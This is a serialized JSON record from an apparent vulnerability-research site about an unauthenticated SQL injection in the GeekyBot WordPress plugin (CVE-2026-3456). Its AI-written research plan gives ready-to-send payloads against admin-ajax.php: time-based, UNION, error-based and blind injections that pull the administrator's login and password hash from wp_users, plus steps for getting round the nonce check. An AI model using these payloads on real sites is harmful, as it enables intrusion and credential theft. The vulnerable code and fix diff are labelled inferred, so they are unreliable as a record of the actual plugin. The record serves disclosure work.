[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKIhIQ90vg7qvVscsDOJffnAvFhr7obnaNX9K_tMycFQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-3456","geekybot-generate-ai-content-without-prompt-chatbot-and-lead-generation-unauthenticated-sql-injection-via-attributekey","GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation \u003C= 1.2.0 - Unauthenticated SQL Injection via 'attributekey'","The GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","geeky-bot",null,"\u003C=1.2.0","1.2.1","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-04 15:06:44","2026-05-05 03:37:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4c716fd3-6297-4b3a-a796-65f68f2986cf?source=api-prod",1,[],"researched",false,3,"This research plan outlines the steps to investigate and exploit the unauthenticated SQL injection vulnerability in the **GeekyBot** WordPress plugin (\u003C= 1.2.0).\n\n---\n\n### 1. Vulnerability Summary\n* **Vulnerability:** Unauthenticated SQL Injection.\n* **Parameter:** `attributekey`.\n* **Condition:** The plugin fails to use `$wpdb->prepare()` or adequate escaping when incorporating the `attributekey` POST\u002FGET parameter into a database query.\n* **Impact:** Unauthenticated attackers can extract sensitive data from the WordPress database, including user credentials (`wp_users`), configuration secrets (`wp_options`), and internal plugin data.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `admin-ajax.php`.\n* **Action:** `geekybot_get_attribute_value` (inferred).\n* **Parameter:** `attributekey` (Vulnerable).\n* **Authentication:** None (via `wp_ajax_nopriv_` hook).\n* **Preconditions:** The plugin must be active. A valid AJAX nonce may be required if the plugin implements a check via `check_ajax_referer`.\n\n### 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with `action=geekybot_get_attribute_value`.\n2. **Hook Registration:** The plugin registers the action:\n `add_action('wp_ajax_nopriv_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler');`\n3. **Vulnerable Function:** The handler function (e.g., `geekybot_get_attribute_value_handler`) retrieves the `attributekey` parameter:\n `$attr_key = $_POST['attributekey'];`\n4. **Database Sink:** The parameter is concatenated directly into a query string:\n `$wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'\");`\n5. **Lack of Preparation:** Because `$wpdb->prepare()` is not used, the `$attr_key` variable can contain SQL metacharacters (like `'`) to break out of the string literal.\n\n### 4. Nonce Acquisition Strategy\nIf the handler performs a nonce check, the nonce is likely localized for the chatbot widget.\n\n1. **Identify Shortcode:** The plugin uses `[geekybot_chatbot]` (inferred) to render the AI interface.\n2. **Create Test Page:**\n ```bash\n wp post create --post_type=page --post_title=\"Chatbot Test\" --post_status=publish --post_content='[geekybot_chatbot]'\n ```\n3. **Navigate and Extract:** Use the `browser_navigate` tool to go to the new page.\n4. **Extract JS Variable:** Use `browser_eval` to find the nonce.\n * **Inferred JS Object:** `window.geekybot_vars`\n * **Inferred Nonce Key:** `nonce`\n * **Execution:** `browser_eval(\"window.geekybot_vars?.nonce\")`\n5. **Bypass Check:** If `wp_create_nonce` and `wp_verify_nonce` use different action strings, or if the check uses `die=false`, the nonce may be unnecessary.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Confirm Vulnerability (Time-Based)\nSend a payload designed to cause a delay.\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** `POST`\n* **Content-Type:** `application\u002Fx-www-form-urlencoded`\n* **Body:**\n ```text\n action=geekybot_get_attribute_value&attributekey=x' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\n ```\n* **Verification:** Measure the response time using the `http_request` tool's metadata.\n\n#### Step 2: Determine Column Count (UNION-Based)\nFind the number of columns in the original query to prepare for data extraction.\n* **Body:**\n ```text\n action=geekybot_get_attribute_value&attributekey=x' UNION SELECT 1,2,3,4,5-- -\n ```\n (Increment numbers until no SQL error is returned).\n\n#### Step 3: Extract Admin Password Hash\n* **Body:**\n ```text\n action=geekybot_get_attribute_value&attributekey=x' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users WHERE ID=1-- -\n ```\n* **Expected Response:** A JSON or HTML response containing the admin username and the `$P$` or `$wp$` hash.\n\n### 6. Test Data Setup\n1. **Plugin Installation:** Ensure `geeky-bot` version 1.2.0 is installed.\n2. **Initialize Plugin:** Some plugins require an API key to be \"active.\" If needed, set a dummy key via WP-CLI:\n ```bash\n wp option update geekybot_api_key \"dummy_key\"\n ```\n3. **Place Shortcode:** Create a public page with `[geekybot_chatbot]` (inferred) to ensure frontend scripts load.\n\n### 7. Expected Results\n* **Success Indicator:** A successful time-based injection will result in a response time > 5 seconds.\n* **Data Leakage:** A UNION-based injection will return database content (e.g., `admin:$P$B...`) within the `data` or `message` fields of the JSON response.\n\n### 8. Verification Steps (Post-Exploit)\nConfirm the extracted data matches the database state via WP-CLI:\n```bash\n# Verify the hash matches the extracted one\nwp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"\n```\n\n### 9. Alternative Approaches\n* **Error-Based SQLi:** If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()`:\n `attributekey=x' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)-- -`\n* **Boolean-Based Blind:** If no output is reflected, use `IF` statements to guess the password character by character:\n `attributekey=x' AND IF(SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),1,1)='$',SLEEP(5),0)-- -`\n* **Parameter Polling:** Check if the parameter is accepted via `GET` if `POST` fails, as some plugins use `$_REQUEST`.","The GeekyBot plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'attributekey' parameter in versions up to 1.2.0. This vulnerability occurs because the plugin fails to use prepared statements or adequate escaping when incorporating user-supplied data into a database query, allowing attackers to extract sensitive data from the database.","\u002F\u002F Hook registration for unauthenticated users\nadd_action('wp_ajax_nopriv_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler');\n\n\u002F\u002F Vulnerable handler function logic\nfunction geekybot_get_attribute_value_handler() {\n $attr_key = $_POST['attributekey'];\n global $wpdb;\n \u002F\u002F Vulnerability: Direct concatenation of user input into SQL query\n $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'\");\n}","--- a\u002Fgeeky-bot-functions.php\n+++ b\u002Fgeeky-bot-functions.php\n@@ -10,1 +10,1 @@\n- $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'\");\n+ $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = %s\", $attr_key));","The exploit targets the WordPress AJAX endpoint at \u002Fwp-admin\u002Fadmin-ajax.php without authentication. An attacker sends a POST request with the 'action' parameter set to 'geekybot_get_attribute_value' and the 'attributekey' parameter containing a SQL injection payload. Using UNION-based injection (e.g., \"x' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users-- -\"), the attacker can exfiltrate sensitive data like administrator password hashes. If a security nonce is checked, it can typically be retrieved from the plugin's localized JavaScript variables on any page where the chatbot shortcode is rendered.","gemini-3-flash-preview","2026-05-04 16:37:56","2026-05-04 16:39:34",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeeky-bot\u002Ftags\u002F1.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeeky-bot.1.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeeky-bot\u002Ftags\u002F1.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgeeky-bot.1.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgeeky-bot\u002Ftags"]